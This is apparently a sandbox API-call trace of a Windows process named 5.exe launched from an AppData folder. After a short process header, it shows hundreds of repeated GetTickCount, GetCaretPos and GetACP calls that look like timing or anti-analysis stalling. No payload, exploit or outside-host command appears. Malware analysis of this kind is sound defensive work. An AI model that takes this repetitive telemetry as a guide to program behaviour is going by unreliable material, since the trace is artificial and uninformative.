"child_process" parent_id = "5" os_parent_pid = "0x6f8" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\cc96d4d5-77d7-41f6-9d0f-85ea800861b4\\5.exe\" " cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e6e5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 50 os_tid = 0x80c [0081.675] GetTickCount () returned 0x115a342 [0081.675] GetTickCount () returned 0x115a342 [0081.675] GetTickCount () returned 0x115a342 [0081.675] GetTickCount () returned 0x115a342 [0081.675] GetTickCount () returned 0x115a342 [0081.675] GetTickCount () returned 0x115a342 [0081.675] GetTickCount () returned 0x115a342 [0081.675] GetTickCount () returned 0x115a342 [0081.675] GetTickCount () returned 0x115a342 [0081.675] GetTickCount () returned 0x115a342 [0081.675] GetTickCount () returned 0x115a342 [0081.675] GetTickCount () returned 0x115a342 [0081.675] GetTickCount () returned 0x115a342 [0081.675] GetTickCount () returned 0x115a342 [0081.675] GetTickCount () returned 0x115a342 [0081.675] GetTickCount () returned 0x115a342 [0081.675] GetTickCount () returned 0x115a342 [0081.675] GetTickCount () returned 0x115a342 [0081.676] GetTickCount () returned 0x115a342 [0081.676] GetTickCount () returned 0x115a342 [0081.676] GetTickCount () returned 0x115a342 [0081.676] GetTickCount () returned 0x115a342 [0081.676] GetTickCount () returned 0x115a342 [0081.676] GetTickCount () returned 0x115a342 [0081.676] GetTickCount () returned 0x115a342 [0081.676] GetTickCount () returned 0x115a342 [0081.676] GetTickCount () returned 0x115a342 [0081.676] GetTickCount () returned 0x115a342 [0081.676] GetTickCount () returned 0x115a342 [0081.676] GetTickCount () returned 0x115a342 [0081.676] GetTickCount () returned 0x115a342 [0081.676] GetTickCount () returned 0x115a342 [0081.676] GetTickCount () returned 0x115a342 [0081.676] GetTickCount () returned 0x115a342 [0081.676] GetTickCount () returned 0x115a342 [0081.676] GetTickCount () returned 0x115a342 [0081.676] GetTickCount () returned 0x115a342 [0081.677] GetTickCount () returned 0x115a342 [0081.677] GetTickCount () returned 0x115a342 [0081.677] GetTickCount () returned 0x115a342 [0081.677] GetTickCount () returned 0x115a342 [0081.677] GetTickCount () returned 0x115a342 [0081.677] GetTickCount () returned 0x115a342 [0081.677] GetTickCount () returned 0x115a342 [0081.677] GetTickCount () returned 0x115a342 [0081.677] GetTickCount () returned 0x115a342 [0081.677] GetTickCount () returned 0x115a342 [0081.677] GetTickCount () returned 0x115a342 [0081.677] GetTickCount () returned 0x115a342 [0081.677] GetTickCount () returned 0x115a342 [0081.677] GetTickCount () returned 0x115a342 [0081.677] GetTickCount () returned 0x115a342 [0081.677] GetTickCount () returned 0x115a342 [0081.677] GetTickCount () returned 0x115a342 [0081.677] GetTickCount () returned 0x115a342 [0081.677] GetTickCount () returned 0x115a342 [0081.678] GetTickCount () returned 0x115a342 [0081.678] GetTickCount () returned 0x115a342 [0081.678] GetTickCount () returned 0x115a342 [0081.678] GetTickCount () returned 0x115a342 [0081.678] GetTickCount () returned 0x115a342 [0081.678] GetTickCount () returned 0x115a342 [0081.678] GetTickCount () returned 0x115a342 [0081.678] GetTickCount () returned 0x115a342 [0081.678] GetTickCount () returned 0x115a342 [0081.678] GetTickCount () returned 0x115a342 [0081.678] GetTickCount () returned 0x115a342 [0081.678] GetTickCount () returned 0x115a342 [0081.678] GetTickCount () returned 0x115a342 [0081.678] GetTickCount () returned 0x115a342 [0081.678] GetTickCount () returned 0x115a342 [0081.678] GetTickCount () returned 0x115a342 [0081.678] GetTickCount () returned 0x115a342 [0081.679] GetTickCount () returned 0x115a342 [0081.679] GetTickCount () returned 0x115a342 [0081.679] GetTickCount () returned 0x115a342 [0081.679] GetTickCount () returned 0x115a342 [0081.679] GetTickCount () returned 0x115a342 [0081.679] GetTickCount () returned 0x115a342 [0081.679] GetTickCount () returned 0x115a342 [0081.679] GetTickCount () returned 0x115a342 [0081.679] GetTickCount () returned 0x115a342 [0081.679] GetTickCount () returned 0x115a342 [0081.679] GetTickCount () returned 0x115a342 [0081.679] GetTickCount () returned 0x115a342 [0081.679] GetTickCount () returned 0x115a342 [0081.679] GetTickCount () returned 0x115a342 [0081.679] GetTickCount () returned 0x115a342 [0081.679] GetTickCount () returned 0x115a342 [0081.679] GetTickCount () returned 0x115a342 [0081.679] GetTickCount () returned 0x115a342 [0081.679] GetTickCount () returned 0x115a342 [0081.680] GetTickCount () returned 0x115a342 [0081.680] GetTickCount () returned 0x115a342 [0081.680] GetTickCount () returned 0x115a342 [0081.680] GetTickCount () returned 0x115a342 [0081.680] GetTickCount () returned 0x115a342 [0081.680] GetTickCount () returned 0x115a342 [0081.680] GetTickCount () returned 0x115a342 [0081.680] GetTickCount () returned 0x115a342 [0081.680] GetTickCount () returned 0x115a342 [0081.680] GetTickCount () returned 0x115a342 [0081.680] GetTickCount () returned 0x115a342 [0081.680] GetTickCount () returned 0x115a342 [0081.680] GetTickCount () returned 0x115a342 [0081.680] GetTickCount () returned 0x115a342 [0081.680] GetTickCount () returned 0x115a342 [0081.680] GetTickCount () returned 0x115a342 [0081.680] GetTickCount () returned 0x115a342 [0081.681] GetTickCount () returned 0x115a342 [0081.681] GetTickCount () returned 0x115a342 [0081.681] GetTickCount () returned 0x115a342 [0081.681] GetTickCount () returned 0x115a342 [0081.681] GetTickCount () returned 0x115a342 [0081.681] GetTickCount () returned 0x115a342 [0081.681] GetTickCount () returned 0x115a342 [0081.681] GetTickCount () returned 0x115a342 [0081.681] GetTickCount () returned 0x115a342 [0081.681] GetTickCount () returned 0x115a342 [0081.681] GetTickCount () returned 0x115a342 [0081.681] GetTickCount () returned 0x115a342 [0081.681] GetTickCount () returned 0x115a342 [0081.681] GetTickCount () returned 0x115a342 [0081.682] GetTickCount () returned 0x115a342 [0081.682] GetTickCount () returned 0x115a342 [0081.682] GetTickCount () returned 0x115a342 [0081.682] GetTickCount () returned 0x115a342 [0081.682] GetTickCount () returned 0x115a342 [0081.682] GetTickCount () returned 0x115a342 [0081.682] GetTickCount () returned 0x115a342 [0081.682] GetTickCount () returned 0x115a342 [0081.682] GetTickCount () returned 0x115a342 [0081.682] GetTickCount () returned 0x115a342 [0081.682] GetTickCount () returned 0x115a342 [0081.682] GetTickCount () returned 0x115a342 [0081.682] GetTickCount () returned 0x115a342 [0081.682] GetTickCount () returned 0x115a342 [0081.683] GetTickCount () returned 0x115a342 [0081.683] GetTickCount () returned 0x115a342 [0081.683] GetTickCount () returned 0x115a342 [0081.683] GetTickCount () returned 0x115a342 [0081.683] GetTickCount () returned 0x115a342 [0081.683] GetTickCount () returned 0x115a342 [0081.683] GetTickCount () returned 0x115a342 [0081.683] GetTickCount () returned 0x115a342 [0081.683] GetTickCount () returned 0x115a342 [0081.683] GetTickCount () returned 0x115a342 [0081.683] GetTickCount () returned 0x115a342 [0081.683] GetTickCount () returned 0x115a342 [0081.683] GetTickCount () returned 0x115a342 [0081.683] GetTickCount () returned 0x115a342 [0081.683] GetTickCount () returned 0x115a342 [0081.683] GetTickCount () returned 0x115a342 [0081.684] GetTickCount () returned 0x115a342 [0081.684] GetTickCount () returned 0x115a342 [0081.684] GetTickCount () returned 0x115a342 [0081.684] GetTickCount () returned 0x115a342 [0081.684] GetTickCount () returned 0x115a342 [0081.684] GetTickCount () returned 0x115a342 [0081.684] GetTickCount () returned 0x115a342 [0081.684] GetTickCount () returned 0x115a342 [0081.684] GetTickCount () returned 0x115a342 [0081.684] GetTickCount () returned 0x115a342 [0081.684] GetTickCount () returned 0x115a342 [0081.684] GetTickCount () returned 0x115a342 [0081.685] GetTickCount () returned 0x115a342 [0081.685] GetTickCount () returned 0x115a342 [0081.685] GetTickCount () returned 0x115a342 [0081.685] GetTickCount () returned 0x115a342 [0081.685] GetTickCount () returned 0x115a342 [0081.685] GetTickCount () returned 0x115a342 [0081.685] GetTickCount () returned 0x115a342 [0081.685] GetTickCount () returned 0x115a342 [0081.685] GetTickCount () returned 0x115a342 [0081.685] GetTickCount () returned 0x115a342 [0081.685] GetTickCount () returned 0x115a342 [0081.685] GetTickCount () returned 0x115a342 [0081.685] GetTickCount () returned 0x115a342 [0081.686] GetTickCount () returned 0x115a342 [0081.686] GetTickCount () returned 0x115a342 [0081.686] GetTickCount () returned 0x115a342 [0081.686] GetTickCount () returned 0x115a342 [0081.686] GetTickCount () returned 0x115a342 [0081.686] GetTickCount () returned 0x115a342 [0081.686] GetTickCount () returned 0x115a342 [0081.686] GetTickCount () returned 0x115a342 [0081.686] GetTickCount () returned 0x115a342 [0081.686] GetTickCount () returned 0x115a342 [0081.686] GetTickCount () returned 0x115a342 [0081.686] GetTickCount () returned 0x115a342 [0081.686] GetTickCount () returned 0x115a342 [0081.687] GetTickCount () returned 0x115a342 [0081.687] GetTickCount () returned 0x115a342 [0081.687] GetTickCount () returned 0x115a342 [0081.687] GetTickCount () returned 0x115a342 [0081.687] GetTickCount () returned 0x115a342 [0081.687] GetTickCount () returned 0x115a342 [0081.687] GetTickCount () returned 0x115a342 [0081.687] GetTickCount () returned 0x115a342 [0081.687] GetTickCount () returned 0x115a342 [0081.687] GetTickCount () returned 0x115a342 [0081.687] GetTickCount () returned 0x115a342 [0081.687] GetTickCount () returned 0x115a342 [0081.687] GetTickCount () returned 0x115a342 [0081.687] GetTickCount () returned 0x115a342 [0081.688] GetTickCount () returned 0x115a342 [0081.688] GetTickCount () returned 0x115a342 [0081.688] GetTickCount () returned 0x115a342 [0081.688] GetTickCount () returned 0x115a342 [0081.688] GetTickCount () returned 0x115a342 [0081.688] GetTickCount () returned 0x115a342 [0081.688] GetTickCount () returned 0x115a342 [0081.688] GetTickCount () returned 0x115a342 [0081.688] GetTickCount () returned 0x115a342 [0081.688] GetTickCount () returned 0x115a342 [0081.688] GetTickCount () returned 0x115a342 [0081.688] GetTickCount () returned 0x115a342 [0081.688] GetTickCount () returned 0x115a342 [0081.688] GetTickCount () returned 0x115a342 [0081.689] GetTickCount () returned 0x115a342 [0081.689] GetTickCount () returned 0x115a342 [0081.689] GetTickCount () returned 0x115a342 [0081.689] GetTickCount () returned 0x115a342 [0081.689] GetTickCount () returned 0x115a342 [0081.689] GetTickCount () returned 0x115a342 [0081.689] GetTickCount () returned 0x115a342 [0081.689] GetTickCount () returned 0x115a342 [0081.689] GetTickCount () returned 0x115a342 [0081.689] GetTickCount () returned 0x115a342 [0081.689] GetTickCount () returned 0x115a352 [0081.690] GetTickCount () returned 0x115a352 [0081.690] GetTickCount () returned 0x115a352 [0081.690] GetTickCount () returned 0x115a352 [0081.690] GetTickCount () returned 0x115a352 [0081.690] GetTickCount () returned 0x115a352 [0081.690] GetTickCount () returned 0x115a352 [0081.690] GetTickCount () returned 0x115a352 [0081.690] GetTickCount () returned 0x115a352 [0081.690] GetTickCount () returned 0x115a352 [0081.690] GetTickCount () returned 0x115a352 [0081.690] GetTickCount () returned 0x115a352 [0081.690] GetTickCount () returned 0x115a352 [0081.690] GetTickCount () returned 0x115a352 [0081.690] GetTickCount () returned 0x115a352 [0081.690] GetTickCount () returned 0x115a352 [0081.690] GetTickCount () returned 0x115a352 [0081.691] GetTickCount () returned 0x115a352 [0081.691] GetTickCount () returned 0x115a352 [0081.691] GetTickCount () returned 0x115a352 [0091.775] lstrlenW (lpString="") returned 0 [0091.775] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.775] GetACP () returned 0x4e4 [0091.775] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.776] GetACP () returned 0x4e4 [0091.776] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.776] GetACP () returned 0x4e4 [0091.776] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.776] GetACP () returned 0x4e4 [0091.776] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.776] GetACP () returned 0x4e4 [0091.776] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.776] GetACP () returned 0x4e4 [0091.776] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.776] GetACP () returned 0x4e4 [0091.776] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.776] GetACP () returned 0x4e4 [0091.776] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.776] GetACP () returned 0x4e4 [0091.776] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.776] GetACP () returned 0x4e4 [0091.777] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.777] GetACP () returned 0x4e4 [0091.777] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.777] GetACP () returned 0x4e4 [0091.777] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.777] GetACP () returned 0x4e4 [0091.777] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.777] GetACP () returned 0x4e4 [0091.777] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.777] GetACP () returned 0x4e4 [0091.777] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.777] GetACP () returned 0x4e4 [0091.777] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.777] GetACP () returned 0x4e4 [0091.777] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.777] GetACP () returned 0x4e4 [0091.777] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.777] GetACP () returned 0x4e4 [0091.778] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.778] GetACP () returned 0x4e4 [0091.778] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.778] GetACP () returned 0x4e4 [0091.778] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.778] GetACP () returned 0x4e4 [0091.778] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.778] GetACP () returned 0x4e4 [0091.778] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.778] GetACP () returned 0x4e4 [0091.778] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.778] GetACP () returned 0x4e4 [0091.778] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.778] GetACP () returned 0x4e4 [0091.778] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.778] GetACP () returned 0x4e4 [0091.778] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.778] GetACP () returned 0x4e4 [0091.778] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.778] GetACP () returned 0x4e4 [0091.778] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.778] GetACP () returned 0x4e4 [0091.779] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.779] GetACP () returned 0x4e4 [0091.779] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.779] GetACP () returned 0x4e4 [0091.779] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.779] GetACP () returned 0x4e4 [0091.779] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.779] GetACP () returned 0x4e4 [0091.779] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.779] GetACP () returned 0x4e4 [0091.779] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.779] GetACP () returned 0x4e4 [0091.779] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.779] GetACP () returned 0x4e4 [0091.779] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.779] GetACP () returned 0x4e4 [0091.779] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.779] GetACP () returned 0x4e4 [0091.779] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.779] GetACP () returned 0x4e4 [0091.779] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.779] GetACP () returned 0x4e4 [0091.780] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.780] GetACP () returned 0x4e4 [0091.780] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.780] GetACP () returned 0x4e4 [0091.780] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.780] GetACP () returned 0x4e4 [0091.780] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.780] GetACP () returned 0x4e4 [0091.780] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.780] GetACP () returned 0x4e4 [0091.780] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.780] GetACP () returned 0x4e4 [0091.780] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.780] GetACP () returned 0x4e4 [0091.780] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.780] GetACP () returned 0x4e4 [0091.780] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.780] GetACP () returned 0x4e4 [0091.780] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.781] GetACP () returned 0x4e4 [0091.781] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.781] GetACP () returned 0x4e4 [0091.781] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.781] GetACP () returned 0x4e4 [0091.781] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.781] GetACP () returned 0x4e4 [0091.781] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.781] GetACP () returned 0x4e4 [0091.781] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.781] GetACP () returned 0x4e4 [0091.781] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.781] GetACP () returned 0x4e4 [0091.781] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.781] GetACP () returned 0x4e4 [0091.781] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.781] GetACP () returned 0x4e4 [0091.782] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.782] GetACP () returned 0x4e4 [0091.782] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.782] GetACP () returned 0x4e4 [0091.782] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.782] GetACP () returned 0x4e4 [0091.782] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.782] GetACP () returned 0x4e4 [0091.782] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.782] GetACP () returned 0x4e4 [0091.782] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.782] GetACP () returned 0x4e4 [0091.782] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.782] GetACP () returned 0x4e4 [0091.782] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.782] GetACP () returned 0x4e4 [0091.782] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.782] GetACP () returned 0x4e4 [0091.782] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.782] GetACP () returned 0x4e4 [0091.782] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.782] GetACP () returned 0x4e4 [0091.782] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.782] GetACP () returned 0x4e4 [0091.782] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.782] GetACP () returned 0x4e4 [0091.785] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.785] GetACP () returned 0x4e4 [0091.785] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.785] GetACP () returned 0x4e4 [0091.785] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.785] GetACP () returned 0x4e4 [0091.785] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.785] GetACP () returned 0x4e4 [0091.785] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.785] GetACP () returned 0x4e4 [0091.785] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.785] GetACP () returned 0x4e4 [0091.785] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.785] GetACP () returned 0x4e4 [0091.785] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.785] GetACP () returned 0x4e4 [0091.785] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.785] GetACP () returned 0x4e4 [0091.785] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.785] GetACP () returned 0x4e4 [0091.786] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.786] GetACP () returned 0x4e4 [0091.786] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.786] GetACP () returned 0x4e4 [0091.786] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.786] GetACP () returned 0x4e4 [0091.786] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.786] GetACP () returned 0x4e4 [0091.786] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.786] GetACP () returned 0x4e4 [0091.786] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.786] GetACP () returned 0x4e4 [0091.786] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.786] GetACP () returned 0x4e4 [0091.786] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.786] GetACP () returned 0x4e4 [0091.786] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.786] GetACP () returned 0x4e4 [0091.786] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.786] GetACP () returned 0x4e4 [0091.786] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.786] GetACP () returned 0x4e4 [0091.787] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.787] GetACP () returned 0x4e4 [0091.787] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.787] GetACP () returned 0x4e4 [0091.787] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.787] GetACP () returned 0x4e4 [0091.787] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.787] GetACP () returned 0x4e4 [0091.787] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.787] GetACP () returned 0x4e4 [0091.787] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.787] GetACP () returned 0x4e4 [0091.787] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.787] GetACP () returned 0x4e4 [0091.787] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.787] GetACP () returned 0x4e4 [0091.787] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.787] GetACP () returned 0x4e4 [0091.787] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.788] GetACP () returned 0x4e4 [0091.788] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.788] GetACP () returned 0x4e4 [0091.788] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.788] GetACP () returned 0x4e4 [0091.788] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.788] GetACP () returned 0x4e4 [0091.788] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.788] GetACP () returned 0x4e4 [0091.788] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.788] GetACP () returned 0x4e4 [0091.788] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.788] GetACP () returned 0x4e4 [0091.788] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.788] GetACP () returned 0x4e4 [0091.788] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.788] GetACP () returned 0x4e4 [0091.788] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.788] GetACP () returned 0x4e4 [0091.788] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.789] GetACP () returned 0x4e4 [0091.789] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.789] GetACP () returned 0x4e4 [0091.789] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.789] GetACP () returned 0x4e4 [0091.789] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.789] GetACP () returned 0x4e4 [0091.789] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.789] GetACP () returned 0x4e4 [0091.789] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.789] GetACP () returned 0x4e4 [0091.789] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.789] GetACP () returned 0x4e4 [0091.789] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.789] GetACP () returned 0x4e4 [0091.789] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.789] GetACP () returned 0x4e4 [0091.789] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.789] GetACP () returned 0x4e4 [0091.789] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.789] GetACP () returned 0x4e4 [0091.789] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.790] GetACP () returned 0x4e4 [0091.790] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.790] GetACP () returned 0x4e4 [0091.790] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.790] GetACP () returned 0x4e4 [0091.790] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.790] GetACP () returned 0x4e4 [0091.790] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.790] GetACP () returned 0x4e4 [0091.790] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.790] GetACP () returned 0x4e4 [0091.790] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.790] GetACP () returned 0x4e4 [0091.790] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.790] GetACP () returned 0x4e4 [0091.790] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.790] GetACP () returned 0x4e4 [0091.790] GetCaretPos (in: lpPoint=0x18f730 | out: lpPoint=0x18f730) returned 1 [0091.790] GetACP () returned 0x4e4 